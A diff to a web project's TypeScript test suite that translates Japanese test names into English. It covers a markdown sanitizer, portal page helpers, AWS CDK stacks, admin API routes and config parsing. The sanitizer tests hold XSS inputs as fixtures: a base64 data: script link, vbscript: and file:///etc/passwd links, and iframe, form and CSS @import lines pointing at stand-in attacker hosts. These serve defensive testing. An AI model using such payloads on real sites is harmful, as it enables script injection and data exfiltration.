-  describe("Issue #865: DOMPurify allowlist 強化", () => {
-    it("data: URL scheme を href から剥がすべき (= data:text/html;base64 XSS gadget 防御)", () => {
+  describe("Issue #865: DOMPurify allowlist hardening", () => {
+    it("should strip data: URL scheme from href (= data:text/html;base64 XSS gadget defense)", () => {
       const html = renderMarkdownToSafeHtml(
         "[click](data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==)",
       );
       expect(html).not.toMatch(/href="data:/);
     });
 
-    it("vbscript: scheme を href から剥がすべき", () => {
+    it("should strip vbscript: scheme from href", () => {
       const html = renderMarkdownToSafeHtml("[click](vbscript:msgbox(1))");
       expect(html).not.toMatch(/href="vbscript:/);
     });
 
-    it("file: scheme を href から剥がすべき", () => {
+    it("should strip file: scheme from href", () => {
       const html = renderMarkdownToSafeHtml("[click](file:///etc/passwd)");
       expect(html).not.toMatch(/href="file:/);
     });
 
-    it("<iframe> は ALLOWED_TAGS に無いので剥がすべき", () => {
+    it("should strip <iframe> since it is not in ALLOWED_TAGS", () => {
       const html = renderMarkdownToSafeHtml(
         '<iframe src="https://attacker.evil.com"></iframe>Hello',
       );
@@ -80,30 +80,30 @@ describe("renderMarkdownToSafeHtml (Issue #661)", () => {
       expect(html).toContain("Hello");
     });
 
-    it("<form action> は剥がすべき (= clickjacking / data exfil gadget)", () => {
+    it("should strip <form action> (= clickjacking / data exfil gadget)", () => {
       const html = renderMarkdownToSafeHtml('<form action="https://attacker"><input></form>');
       expect(html).not.toContain("<form");
     });
 
-    it("<style> は剥がすべき (= CSS-based exfil)", () => {
+    it("should strip <style> (= CSS-based exfil)", () => {
       const html = renderMarkdownToSafeHtml("<style>@import url(https://attacker/exfil)</style>Hi");
       expect(html).not.toContain("<style");
       expect(html).toContain("Hi");
     });
 
-    it("onclick attribute は FORBID_ATTR で剥がすべき", () => {
+    it("should strip onclick attribute via FORBID_ATTR", () => {
       const html = renderMarkdownToSafeHtml(
         '<a href="https://example.com" onclick="alert(1)">x</a>',
       );
       expect(html).not.toContain("onclick");
     });
 
-    it("正常な https:// link は保持すべき", () => {
+    it("should preserve normal https:// links", () => {
       const html = renderMarkdownToSafeHtml("[docs](https://example.com/docs)");
       expect(html).toMatch(/href="https:\/\/example\.com\/docs"/);
     });
 
-    it("mailto: link は保持すべき", () => {
+    it("should preserve mailto: links", () => {
       const html = renderMarkdownToSafeHtml("[mail](mailto:a@example.com)");
       expect(html).toMatch(/href="mailto:a@example\.com"/);
     });

--- a/apps/participant-portal/test/pages/ProblemDetail.test.ts
+++ b/apps/participant-portal/test/pages/ProblemDetail.test.ts
@@ -6,26 +6,26 @@ import {
 } from "../../src/pages/ProblemDetail";
 
 describe("ProblemDetail helpers", () => {
-  it("scoring_not_started gate のとき lock 状態にすべき", () => {
+  it("should lock when the scoring_not_started gate is active", () => {
     expect(isProblemDetailLocked({ kind: "scoring_not_started" })).toBe(true);
   });
 
-  it("gate が無い / scoring_not_started 以外なら lock しないべき", () => {
+  it("should not lock when there is no gate or the gate is not scoring_not_started", () => {
     expect(isProblemDetailLocked(undefined)).toBe(false);
     expect(isProblemDetailLocked({ kind: "ok" })).toBe(false);
     expect(isProblemDetailLocked({ kind: "scoring_ended" })).toBe(false);
   });
 
-  it("problem があり lock されていなければ問題本文を表示すべき", () => {
+  it("should display the problem body when a problem exists and is not locked", () => {
     expect(canRenderProblemDetailBody({ hasProblem: true, locked: false })).toBe(true);
   });
 
-  it("problem 不在または lock 中なら問題本文を表示しないべき", () => {
+  it("should not display the problem body when no problem exists or it is locked", () => {
     expect(canRenderProblemDetailBody({ hasProblem: false, locked: false })).toBe(false);
     expect(canRenderProblemDetailBody({ hasProblem: true, locked: true })).toBe(false);
   });
 
-  it("problem / metadata / endpoint があり lock されていなければ endpoint override を表示すべき", () => {
+  it("should display endpoint override when problem / metadata / endpoint exist and not locked", () => {
     expect(
       canRenderEndpointOverride({
         hasProblem: true,
@@ -36,7 +36,7 @@ describe("ProblemDetail helpers", () => {
     ).toBe(true);
   });
 
-  it("endpoint override の前提が欠けるか lock 中なら表示しないべき", () => {
+  it("should not display when endpoint override preconditions are missing or it is locked", () => {
     expect(
       canRenderEndpointOverride({
         hasProblem: true,

--- a/apps/participant-portal/test/pages/TeamSetup.test.ts
+++ b/apps/participant-portal/test/pages/TeamSetup.test.ts
@@ -7,21 +7,21 @@ import {
 } from "../../src/pages/TeamSetup";
 
 describe("TeamSetup helpers", () => {
-  it("team name を trim し、有効な入力を判定すべき", () => {
+  it("should trim team name and judge valid input", () => {
     expect(describeTeamNameDraft("  Team Alpha  ")).toEqual({
       trimmed: "Team Alpha",
       invalid: false,
     });
   });
 
-  it("不正文字を含む team name を invalid にすべき", () => {
+  it("should mark team names containing invalid characters as invalid", () => {
     expect(describeTeamNameDraft("Team!")).toEqual({
       trimmed: "Team!",
       invalid: true,
     });
   });
 
-  it("sessionToken があり非空かつ valid で送信中でなければ submit 可能にすべき", () => {
+  it("should allow submit when sessionToken exists, value is non-empty and valid, and not submitting", () => {
     expect(
       canSubmitTeamName({
         sessionToken: "session-token",
@@ -32,7 +32,7 @@ describe("TeamSetup helpers", () => {
     ).toBe(true);
   });
 
-  it("sessionToken 不在 / 空 / invalid / submitting は submit 不可にすべき", () => {
+  it("should disallow submit when sessionToken is missing / empty / invalid / submitting", () => {
     expect(
       canSubmitTeamName({
         sessionToken: undefined,
@@ -67,13 +67,13 @@ describe("TeamSetup helpers", () => {
     ).toBe(false);
   });
 
-  it("validation error は i18n 済み message に整形すべき", () => {
+  it("should format validation errors into an i18n message", () => {
     expect(
       formatTeamSetupSubmitError(new PortalValidationError("invalid"), "validation failed"),
     ).toBe("validation failed");
   });
 
-  it("Error 以外も string 化すべき", () => {
+  it("should stringify non-Error values", () => {
     expect(formatTeamSetupSubmitError("boom", "validation failed")).toBe("boom");
   });
 });

--- a/infrastructure/test/admin-console-hosting.test.ts
+++ b/infrastructure/test/admin-console-hosting.test.ts
@@ -39,7 +39,7 @@ describe("AdminConsoleHostingStack", () => {
   });
 
   describe("CloudFront security headers (CSP wildcard, Issue #1031)", () => {
-    it("connect-src に execute-api region wildcard を含むべき", () => {
+    it("connect-src should include the execute-api region wildcard", () => {
       const template = synth();
       const policies = template.findResources("AWS::CloudFront::ResponseHeadersPolicy");
       const policy = Object.values(policies)[0];
@@ -48,7 +48,7 @@ describe("AdminConsoleHostingStack", () => {
       expect(cspJson).toContain("https://*.execute-api.ap-northeast-1.amazonaws.com");
     });
 
-    it("connect-src に Cognito domain wildcard を含むべき", () => {
+    it("connect-src should include the Cognito domain wildcard", () => {
       const template = synth();
       const policies = template.findResources("AWS::CloudFront::ResponseHeadersPolicy");
       const policy = Object.values(policies)[0];
@@ -57,7 +57,7 @@ describe("AdminConsoleHostingStack", () => {
       expect(cspJson).toContain("https://cognito-idp.ap-northeast-1.amazonaws.com");
     });
 
-    it("form-action に Cognito domain wildcard を含むべき (= Hosted UI sign-in form)", () => {
+    it("form-action should include the Cognito domain wildcard (Hosted UI sign-in form)", () => {
       const template = synth();
       const policies = template.findResources("AWS::CloudFront::ResponseHeadersPolicy");
       const policy = Object.values(policies)[0];
@@ -67,7 +67,7 @@ describe("AdminConsoleHostingStack", () => {
   });
 
   describe("Issue #1031: runtime-config 分離", () => {
-    it("RuntimeConfigDeployment を本 stack に持たないべき (= AdminConsoleRuntimeConfigStack に移管)", () => {
+    it("should not have RuntimeConfigDeployment in this stack (migrated to AdminConsoleRuntimeConfigStack)", () => {
       const template = synth();
       // BucketDeployment は 1 つだけ (= SiteDeployment for dist/)、 旧 RuntimeConfigDeployment は無い。
       const bucketDeployments = template.findResources("Custom::CDKBucketDeployment");

--- a/infrastructure/test/admin-insight/admin-console-insight-stack.test.ts
+++ b/infrastructure/test/admin-insight/admin-console-insight-stack.test.ts
@@ -45,7 +45,7 @@ function synthInsightStack(adminConsoleOrigin?: string): Template {
 
 describe("AdminConsoleInsightStack (ADR-011 Phase 1.A)", () => {
   describe("Lambda", () => {
-    it("AdminInsight Lambda を Node.js 22 / arm64 で 1 個 立てるべき", () => {
+    it("should provision 1 AdminInsight Lambda on Node.js 22 / arm64", () => {
       const tpl = synthInsightStack();
       tpl.resourceCountIs("AWS::Lambda::Function", 1);
       tpl.hasResourceProperties(
@@ -57,7 +57,7 @@ describe("AdminConsoleInsightStack (ADR-011 Phase 1.A)", () => {
       );
     });
 
-    it("Lambda env に Deployments / Events / Teams Table 名を渡すべき", () => {
+    it("should pass Deployments / Events / Teams table names to Lambda env", () => {
       const tpl = synthInsightStack();
       tpl.hasResourceProperties(
         "AWS::Lambda::Function",
@@ -75,12 +75,12 @@ describe("AdminConsoleInsightStack (ADR-011 Phase 1.A)", () => {
   });
 
   describe("HTTP API + Cognito JWT Authorizer", () => {
-    it("HTTP API (API GW v2) を 1 つ持つべき", () => {
+    it("should have 1 HTTP API (API GW v2)", () => {
       const tpl = synthInsightStack();
       tpl.resourceCountIs("AWS::ApiGatewayV2::Api", 1);
     });
 
-    it("JWT Authorizer (= Cognito UserPool 連動) を持つべき", () => {
+    it("should have a JWT Authorizer (linked to Cognito UserPool)", () => {
       const tpl = synthInsightStack();
       tpl.hasResourceProperties(
         "AWS::ApiGatewayV2::Authorizer",
@@ -91,7 +91,7 @@ describe("AdminConsoleInsightStack (ADR-011 Phase 1.A)", () => {
       );
     });
 
-    it("GET /admin/insight/tenants/summary route が JWT Authorizer に紐づくべき", () => {
+    it("GET /admin/insight/tenants/summary route should be wired to the JWT Authorizer", () => {
       const tpl = synthInsightStack();
       const routes = tpl.findResources("AWS::ApiGatewayV2::Route", {
         Properties: { RouteKey: "GET /admin/insight/tenants/summary" },
@@ -104,7 +104,7 @@ describe("AdminConsoleInsightStack (ADR-011 Phase 1.A)", () => {
       expect(route.Properties.AuthorizerId).toBeDefined();
     });
 
-    it("Phase 1.B drill-down 4 route (events / event detail / deployment / stack-progress) を持つべき", () => {
+    it("should have the 4 Phase 1.B drill-down routes (events / event detail / deployment / stack-progress)", () => {
       const tpl = synthInsightStack();
       const expected = [
         "GET /admin/insight/tenants/{tenantId}/events",
@@ -124,7 +124,7 @@ describe("AdminConsoleInsightStack (ADR-011 Phase 1.A)", () => {
       }
     });
 
-    it("CORS allowOrigins に localhost dev を入れるべき", () => {
+    it("should include localhost dev in CORS allowOrigins", () => {
       const tpl = synthInsightStack();
       tpl.hasResourceProperties(
         "AWS::ApiGatewayV2::Api",
@@ -141,7 +141,7 @@ describe("AdminConsoleInsightStack (ADR-011 Phase 1.A)", () => {
       );
     });
 
-    it("CDK_PARAM_ADMIN_CONSOLE_ORIGIN 相当の adminConsoleOrigin を CORS に追加するべき", () => {
+    it("should add adminConsoleOrigin (equivalent to CDK_PARAM_ADMIN_CONSOLE_ORIGIN) to CORS", () => {
       const tpl = synthInsightStack("https://abc.cloudfront.net");
       tpl.hasResourceProperties(
         "AWS::ApiGatewayV2::Api",
@@ -170,7 +170,7 @@ describe("AdminConsoleInsightStack (ADR-011 Phase 1.A)", () => {
       return allActions;
     }
 
-    it("Deployments / Events / Teams Table の read のみを Allow するべき (write は禁止)", () => {
+    it("should Allow only reads on Deployments / Events / Teams tables (no writes)", () => {
       const tpl = synthInsightStack();
       // Lambda role に attach された IAM Policy の中に DynamoDB write action が無いことを
       // 強めに検証する (= 旧 grantReadWriteData で誤 wire したら test が落ちる)。
@@ -183,7 +183,7 @@ describe("AdminConsoleInsightStack (ADR-011 Phase 1.A)", () => {
       expect(allActions.some((a) => a === "dynamodb:Query" || a === "dynamodb:GetItem")).toBe(true);
     });
 
-    it("Phase 1.B: Teams table の read を grant するべき (#598)", () => {
+    it("Phase 1.B: should grant Teams-table read (#598)", () => {
       const tpl = synthInsightStack();
       // Teams は Phase 1.A では env 注入のみだったが、Phase 1.B drill-down で read 権限を
       // 追加する。Policy が Teams table の ARN を参照する Statement を 1 つ以上持つこと。
@@ -194,7 +194,7 @@ describe("AdminConsoleInsightStack (ADR-011 Phase 1.A)", () => {
       expect(policyJsonAll).toContain("Teams");
     });
 
-    it("Phase 1.B: CFn DescribeStackEvents / DescribeStackResources を grant するべき (#598)", () => {
+    it("Phase 1.B: should grant CFn DescribeStackEvents / DescribeStackResources (#598)", () => {
       const tpl = synthInsightStack();
       const allActions = collectActions(tpl);
       expect(allActions).toContain("cloudformation:DescribeStackEvents");
@@ -203,7 +203,7 @@ describe("AdminConsoleInsightStack (ADR-011 Phase 1.A)", () => {
   });
 
   describe("Outputs", () => {
-    it("AdminInsightApiUrl を Output として出すべき", () => {
+    it("should expose AdminInsightApiUrl as a stack Output", () => {
       const tpl = synthInsightStack();
       const outputs = tpl.findOutputs("*");
       expect(Object.keys(outputs)).toContain("AdminInsightApiUrl");

--- a/infrastructure/test/admin-insight/admin-insight-routes.test.ts
+++ b/infrastructure/test/admin-insight/admin-insight-routes.test.ts
@@ -36,7 +36,7 @@ function withClaims(claims: Record<string, unknown>) {
 describe("GET /admin/insight/tenants/summary", () => {
   beforeEach(() => vi.clearAllMocks());
 
-  it("SystemAdmin role claim があれば 200 を返すべき", async () => {
+  it("should return 200 when the SystemAdmin role claim is present", async () => {
     mocks.summarizeTenants.mockResolvedValueOnce({
       items: [{ tenantId: "t-1", activeDeploys: 2, failedDeploys: 0, totalEvents: 3 }],
     });
@@ -52,7 +52,7 @@ describe("GET /admin/insight/tenants/summary", () => {
     expect(body.items[0].tenantId).toBe("t-1");
   });
 
-  it("SystemAdmin claim 無し (Tenant Admin) は 403 を返すべき", async () => {
+  it("should return 403 when SystemAdmin claim is missing (Tenant Admin)", async () => {
     const res = await app.request(
       "/admin/insight/tenants/summary?tenantIds=t-1",
       {},
@@ -62,12 +62,12 @@ describe("GET /admin/insight/tenants/summary", () => {
     expect(mocks.summarizeTenants).not.toHaveBeenCalled();
   });
 
-  it("claims が無い (= JWT 経路を通っていない) なら 403 を返すべき", async () => {
+  it("should return 403 when claims are missing (= JWT path was not taken)", async () => {
     const res = await app.request("/admin/insight/tenants/summary?tenantIds=t-1");
     expect(res.status).toBe(403);
   });
 
-  it("custom:userRole の前後 whitespace は trim して認可するべき", async () => {
+  it("should trim leading/trailing whitespace on custom:userRole before authorizing", async () => {
     mocks.summarizeTenants.mockResolvedValueOnce({ items: [] });
     const res = await app.request(
       "/admin/insight/tenants/summary?tenantIds=t-1",
@@ -77,7 +77,7 @@ describe("GET /admin/insight/tenants/summary", () => {
     expect(res.status).toBe(200);
   });
 
-  it("tenantIds query が空なら 200 + 空 items を返すべき (DDB は叩かない)", async () => {
+  it("should return 200 + empty items when tenantIds query is empty (no DDB call)", async () => {
     const res = await app.request(
       "/admin/insight/tenants/summary",
       {},
@@ -110,7 +110,7 @@ describe("GET /admin/insight/tenants/summary", () => {
     expect(mocks.summarizeTenants).not.toHaveBeenCalled();
   });
 
-  it("内部 throw は 500 + body { error: 'internal_error' } を返すべき", async () => {
+  it("should return 500 + body { error: 'internal_error' } on internal throw", async () => {
     mocks.summarizeTenants.mockRejectedValueOnce(new Error("ddb down"));
     const res = await app.request(
       "/admin/insight/tenants/summary?tenantIds=t-1",
@@ -124,7 +124,7 @@ describe("GET /admin/insight/tenants/summary", () => {
     expect(JSON.stringify(body)).not.toContain("ddb down");
   });
 
-  it("ADR-011 D5 audit log: 各 read で admin.insight.read を console.log するべき", async () => {
+  it("ADR-011 D5 audit log: should console.log admin.insight.read on each read", async () => {
     const spy = vi.spyOn(console, "log").mockImplementation(() => undefined);
     mocks.summarizeTenants.mockResolvedValueOnce({ items: [] });
     await app.request(
@@ -147,7 +147,7 @@ describe("GET /admin/insight/tenants/summary", () => {
 });
 
 describe("GET /admin/insight/healthz", () => {
-  it("認可不要で 200 を返すべき (= API GW で除外する余地もあるが Lambda 側も対応)", async () => {
+  it("should return 200 without authorization (API GW may exclude it, but Lambda handles it too)", async () => {
     const res = await app.request("/admin/insight/healthz");
     expect(res.status).toBe(200);
     const body = await res.json();

--- a/infrastructure/test/admin-insight/audit-routes.test.ts
+++ b/infrastructure/test/admin-insight/audit-routes.test.ts
@@ -23,7 +23,7 @@ function buildMock() {
 }
 
 describe("listAuditEntries (#950)", () => {
-  it("scope=tenant は PK=TENANT#<id> で Query するべき", async () => {
+  it("scope=tenant should Query with PK=TENANT#<id>", async () => {
     const { ddb, send } = buildMock();
     send.mockResolvedValueOnce({
       Items: [
@@ -55,7 +55,7 @@ describe("listAuditEntries (#950)", () => {
     expect(cmd.input?.ScanIndexForward).toBe(false);
   });
 
-  it("scope=system は PK=SYSTEM#<env> で Query するべき", async () => {
+  it("scope=system should Query with PK=SYSTEM#<env>", async () => {
     const { ddb, send } = buildMock();
     send.mockResolvedValueOnce({ Items: [], LastEvaluatedKey: undefined });
     await listAuditEntries({ ddb: ddb as never, auditTableName: "T" }, { scope: "system" }, "prod");
@@ -65,7 +65,7 @@ describe("listAuditEntries (#950)", () => {
     );
   });
 
-  it("LastEvaluatedKey から nextCursor を base64 で返すべき", async () => {
+  it("should return nextCursor as base64 from LastEvaluatedKey", async () => {
     const { ddb, send } = buildMock();
     const lastKey = { PK: "TENANT#t-1", SK: "AUDIT#01HX" };
     send.mockResolvedValueOnce({ Items: [], LastEvaluatedKey: lastKey });
@@ -77,7 +77,7 @@ describe("listAuditEntries (#950)", () => {
     expect(out.nextCursor).toBe(Buffer.from(JSON.stringify(lastKey)).toString("base64"));
   });
 
-  it("cursor を decode して ExclusiveStartKey に渡すべき", async () => {
+  it("should decode the cursor and pass it as ExclusiveStartKey", async () => {
     const { ddb, send } = buildMock();
     send.mockResolvedValueOnce({ Items: [], LastEvaluatedKey: undefined });
     const key = { PK: "TENANT#t-1", SK: "AUDIT#01HX" };
@@ -91,7 +91,7 @@ describe("listAuditEntries (#950)", () => {
     expect(cmd.input?.ExclusiveStartKey).toEqual(key);
   });
 
-  it("limit > 200 は 200 に clamp するべき", async () => {
+  it("should clamp limit > 200 to 200", async () => {
     const { ddb, send } = buildMock();
     send.mockResolvedValueOnce({ Items: [], LastEvaluatedKey: undefined });
     await listAuditEntries(
@@ -103,7 +103,7 @@ describe("listAuditEntries (#950)", () => {
     expect(cmd.input?.Limit).toBe(200);
   });
 
-  it("optional attrs (target / ipAddress / userAgent / extra) を含む item を正しく map するべき", async () => {
+  it("should correctly map items containing optional attrs (target / ipAddress / userAgent / extra)", async () => {
     const { ddb, send } = buildMock();
     send.mockResolvedValueOnce({
       Items: [

--- a/infrastructure/test/admin-insight/auth.test.ts
+++ b/infrastructure/test/admin-insight/auth.test.ts
@@ -27,7 +27,7 @@ describe("isSystemAdmin", () => {
     expect(isSystemAdmin(buildContext({ "custom:userRole": "SYSTEMADMIN" }))).toBe(false);
   });
 
-  it("custom:userRole の前後 whitespace は trim して評価すべき", () => {
+  it("should trim leading/trailing whitespace on custom:userRole before evaluation", () => {
     expect(isSystemAdmin(buildContext({ "custom:userRole": "  SystemAdmin  " }))).toBe(true);
   });
 
@@ -47,16 +47,16 @@ describe("isSystemAdmin", () => {
 });
 
 describe("resolveCognitoSub", () => {
-  it("sub claim があればその文字列を返すべき", () => {
+  it("should return the sub claim string when present", () => {
     expect(resolveCognitoSub(buildContext({ sub: "abc-123" }))).toBe("abc-123");
   });
 
-  it("sub が無いなら 'unknown' を返すべき", () => {
+  it("should return 'unknown' when sub is missing", () => {
     expect(resolveCognitoSub(buildContext())).toBe("unknown");
     expect(resolveCognitoSub(buildContext({}))).toBe("unknown");
   });
 
-  it("sub が空文字なら 'unknown' を返すべき", () => {
+  it("should return 'unknown' when sub is an empty string", () => {
     expect(resolveCognitoSub(buildContext({ sub: "" }))).toBe("unknown");
   });
 });

--- a/infrastructure/test/admin-insight/pipeline-executions.test.ts
+++ b/infrastructure/test/admin-insight/pipeline-executions.test.ts
@@ -16,7 +16,7 @@ function buildDeps(send: ReturnType<typeof vi.fn>, region: string): ListPipeline
 }
 
 describe("buildExecutionConsoleUrl", () => {
-  it("CodePipeline console の timeline deep link を組み立てるべき", () => {
+  it("should build the CodePipeline console timeline deep link", () => {
     const url = buildExecutionConsoleUrl("ap-northeast-1", "tenkacloud-saas-pipeline", "exec-1");
     expect(url).toContain(
       "https://ap-northeast-1.console.aws.amazon.com/codesuite/codepipeline/pipelines/tenkacloud-saas-pipeline/executions/exec-1/timeline",
@@ -24,14 +24,14 @@ describe("buildExecutionConsoleUrl", () => {
     expect(url).toContain("region=ap-northeast-1");
   });
 
-  it("特殊文字を含む executionId を encode すべき", () => {
+  it("should encode executionIds containing special characters", () => {
     const url = buildExecutionConsoleUrl("us-east-1", "p", "exec/with slash");
     expect(url).toContain("exec%2Fwith%20slash");
   });
 });
 
 describe("summarizeExecution", () => {
-  it("status / start / lastUpdate / consoleUrl を抽出すべき", () => {
+  it("should extract status / start / lastUpdate / consoleUrl", () => {
     const out = summarizeExecution("ap-northeast-1", "tenkacloud-saas-pipeline", {
       pipelineExecutionId: "exec-abc",
       status: "Succeeded",
@@ -47,14 +47,14 @@ describe("summarizeExecution", () => {
     expect(out.consoleUrl).toContain("exec-abc");
   });
 
-  it("executionId が無い summary は null を返すべき (= defensive)", () => {
+  it("should return null for summaries without executionId (defensive)", () => {
     const out = summarizeExecution("ap-northeast-1", "p", {
       status: "Failed",
     });
     expect(out).toBeNull();
   });
 
-  it('status が無ければ "Unknown" にフォールバックすべき', () => {
+  it('should fall back to "Unknown" when status is missing', () => {
     const out = summarizeExecution("ap-northeast-1", "p", {
       pipelineExecutionId: "x",
     });
@@ -63,7 +63,7 @@ describe("summarizeExecution", () => {
 });
 
 describe("listPipelineExecutions", () => {
-  it("CodePipeline ListPipelineExecutionsCommand を pipelineName=tenkacloud-saas-pipeline で叩くべき", async () => {
+  it("should call CodePipeline ListPipelineExecutionsCommand with pipelineName=tenkacloud-saas-pipeline", async () => {
     const send = vi.fn().mockResolvedValue({
       pipelineExecutionSummaries: [
         {
@@ -85,7 +85,7 @@ describe("listPipelineExecutions", () => {
     expect(out.items[0].executionId).toBe("e1");
   });
 
-  it("limit 未指定なら default=50 で呼ぶべき", async () => {
+  it("should call with default=50 when limit is unspecified", async () => {
     const send = vi.fn().mockResolvedValue({ pipelineExecutionSummaries: [] });
     await listPipelineExecutions(buildDeps(send, "us-east-1"));
     const cmd = (send.mock.calls[0] as unknown[])[0] as {
@@ -103,7 +103,7 @@ describe("listPipelineExecutions", () => {
     expect(cmd.input.maxResults).toBe(100);
   });
 
-  it("limit < 1 でも最低 1 で呼ぶべき (= defensive)", async () => {
+  it("should call with at least 1 even when limit < 1 (defensive)", async () => {
     const send = vi.fn().mockResolvedValue({ pipelineExecutionSummaries: [] });
     await listPipelineExecutions(buildDeps(send, "us-east-1"), { limit: 0 });
     const cmd = (send.mock.calls[0] as unknown[])[0] as {
@@ -112,7 +112,7 @@ describe("listPipelineExecutions", () => {
     expect(cmd.input.maxResults).toBe(1);
   });
 
-  it("executionId が無い summary は drop すべき", async () => {
+  it("should drop summaries without executionId", async () => {
     const send = vi.fn().mockResolvedValue({
       pipelineExecutionSummaries: [
         { pipelineExecutionId: "e1", status: "Succeeded" },

--- a/infrastructure/test/admin-insight/summary.test.ts
+++ b/infrastructure/test/admin-insight/summary.test.ts
@@ -14,7 +14,7 @@ function buildShared(send: ReturnType<typeof vi.fn>) {
 describe("summarizeTenants", () => {
   beforeEach(() => vi.clearAllMocks());
 
-  it("単一 tenant: active/failed deploy + total events を正しく集計するべき", async () => {
+  it("single tenant: should correctly aggregate active/failed deploy + total events", async () => {
     const send = vi.fn().mockImplementation(async (cmd: QueryCommand) => {
       const tableName = cmd.input.TableName;
       if (tableName === "TestDeployments") {
@@ -45,7 +45,7 @@ describe("summarizeTenants", () => {
     });
   });
 
-  it("重複 tenantId は 1 度しか query しないべき", async () => {
+  it("should query duplicate tenantIds only once", async () => {
     const send = vi.fn().mockResolvedValue({ Items: [], Count: 0 });
     const shared = buildShared(send);
     await summarizeTenants(shared, ["tenant-a", "tenant-a", "tenant-a"]);
@@ -54,14 +54,14 @@ describe("summarizeTenants", () => {
     expect(send).toHaveBeenCalledTimes(2);
   });
 
-  it("結果順は入力順 (重複除去後) を保つべき", async () => {
+  it("should preserve input order (after dedupe) in results", async () => {
     const send = vi.fn().mockResolvedValue({ Items: [], Count: 0 });
     const shared = buildShared(send);
     const result = await summarizeTenants(shared, ["tenant-c", "tenant-a", "tenant-b"]);
     expect(result.items.map((i) => i.tenantId)).toEqual(["tenant-c", "tenant-a", "tenant-b"]);
   });
 
-  it("空 tenantIds で空 items を返すべき (DDB を叩かない)", async () => {
+  it("should return empty items for empty tenantIds (no DDB call)", async () => {
     const send = vi.fn();
     const shared = buildShared(send);
     const result = await summarizeTenants(shared, []);
@@ -69,7 +69,7 @@ describe("summarizeTenants", () => {
     expect(send).not.toHaveBeenCalled();
   });
 
-  it("page 跨ぎ (LastEvaluatedKey) があれば全 page 集計するべき", async () => {
+  it("should aggregate across all pages when LastEvaluatedKey indicates more pages", async () => {
     let deployCall = 0;
     const send = vi.fn().mockImplementation(async (cmd: QueryCommand) => {
       const tableName = cmd.input.TableName;
@@ -94,7 +94,7 @@ describe("summarizeTenants", () => {
     });
   });
 
-  it("Deployments query は GSI1 + TENANT#<id> partition key を使うべき", async () => {
+  it("Deployments query should use GSI1 + TENANT#<id> partition key", async () => {
     const send = vi.fn().mockResolvedValue({ Items: [], Count: 0 });
     const shared = buildShared(send);
     await summarizeTenants(shared, ["tenant-acme"]);
@@ -106,7 +106,7 @@ describe("summarizeTenants", () => {
     expect(deployQuery?.input.ExpressionAttributeValues?.[":pk"]).toBe("TENANT#tenant-acme");
   });
 
-  it("Events query は Select=COUNT で payload を最小化するべき", async () => {
+  it("Events query should minimize payload via Select=COUNT", async () => {
     const send = vi.fn().mockResolvedValue({ Items: [], Count: 0 });
     const shared = buildShared(send);
     await summarizeTenants(shared, ["tenant-acme"]);

--- a/infrastructure/test/app-config/resolve.test.ts
+++ b/infrastructure/test/app-config/resolve.test.ts
@@ -29,7 +29,7 @@ const noopDotenv = () => undefined;
 const fsAlwaysMissing = { existsSync: () => false };
 
 describe("resolveAppConfig", () => {
-  it("CDK_PARAM_SYSTEM_ADMIN_EMAIL が未設定なら throw すべき", () => {
+  it("should throw when CDK_PARAM_SYSTEM_ADMIN_EMAIL is unset", () => {
     expect(() =>
       resolveAppConfig({
         env: baseEnv({ CDK_PARAM_SYSTEM_ADMIN_EMAIL: undefined }),
@@ -41,7 +41,7 @@ describe("resolveAppConfig", () => {
     ).toThrow(/system admin email/i);
   });
 
-  it("CDK_PARAM_TENANT_ID 未設定なら pooled をデフォルトにし、 isPooledDeploy が true になるべき", () => {
+  it("should default to pooled and set isPooledDeploy=true when CDK_PARAM_TENANT_ID is unset", () => {
     const cfg = resolveAppConfig({
       env: baseEnv(),
       binDir: BIN_DIR,
@@ -54,7 +54,7 @@ describe("resolveAppConfig", () => {
     expect(cfg.tenantName).toBe("Shared Pooled Tenant");
   });
 
-  it("CDK_PARAM_TENANT_ID が ULID で CDK_PARAM_TENANT_NAME 未設定なら、 tenantName は tenantId にフォールバックすべき", () => {
+  it("should fall back tenantName to tenantId when CDK_PARAM_TENANT_ID is a ULID and CDK_PARAM_TENANT_NAME is unset", () => {
     const cfg = resolveAppConfig({
       env: baseEnv({ CDK_PARAM_TENANT_ID: "01ABCXYZ" }),
       binDir: BIN_DIR,
@@ -67,7 +67,7 @@ describe("resolveAppConfig", () => {
     expect(cfg.isPooledDeploy).toBe(false);
   });
 
-  it("CDK_PARAM_TENANT_NAME が set されていれば優先すべき (#748 fix のもう一段下流)", () => {
+  it("should prefer CDK_PARAM_TENANT_NAME when set (downstream of #748 fix)", () => {
     const cfg = resolveAppConfig({
       env: baseEnv({ CDK_PARAM_TENANT_ID: "t-1", CDK_PARAM_TENANT_NAME: "Acme Corp" }),
       binDir: BIN_DIR,
@@ -78,7 +78,7 @@ describe("resolveAppConfig", () => {
     expect(cfg.tenantName).toBe("Acme Corp");
   });
 
-  it("DynamoDB billing mode の default は PROVISIONED + 1/1 capacity であるべき (Free Tier 圧迫防止)", () => {
+  it("DynamoDB billing mode default should be PROVISIONED + 1/1 capacity (Free Tier safety)", () => {
     const cfg = resolveAppConfig({
       env: baseEnv(),
       binDir: BIN_DIR,
@@ -129,7 +129,7 @@ describe("resolveAppConfig", () => {
     expect(cfg.kmsPendingWindowInDays).toBe(21);
   });
 
-  it("namePrefix は `{appNameLower}-{environment}` で組み立てるべき", () => {
+  it("namePrefix should be built as `{appNameLower}-{environment}`", () => {
     const cfg = resolveAppConfig({
       env: baseEnv(),
       binDir: BIN_DIR,
@@ -140,7 +140,7 @@ describe("resolveAppConfig", () => {
     expect(cfg.namePrefix).toBe("tenkacloud-development");
   });
 
-  it("apiKeySSMParameterNames は 4 tier 分の keyId / value 名を namePrefix 込みで返すべき", () => {
+  it("apiKeySSMParameterNames should return keyId / value names for all 4 tiers including namePrefix", () => {
     const cfg = resolveAppConfig({
       env: baseEnv(),
       binDir: BIN_DIR,
@@ -156,7 +156,7 @@ describe("resolveAppConfig", () => {
     );
   });
 
-  it("CDK_PARAM_DEPLOY_CONCURRENT_BUILD_LIMIT が整数でなければ throw すべき", () => {
+  it("should throw if CDK_PARAM_DEPLOY_CONCURRENT_BUILD_LIMIT is not an integer", () => {
     expect(() =>
       resolveAppConfig({
         env: baseEnv({ CDK_PARAM_DEPLOY_CONCURRENT_BUILD_LIMIT: "abc" }),
@@ -168,7 +168,7 @@ describe("resolveAppConfig", () => {
     ).toThrow(/整数で指定/);
   });
 
-  it("CDK_PARAM_DEPLOY_CONCURRENT_BUILD_LIMIT が未設定なら undefined を返すべき (= account-level quota 任せ)", () => {
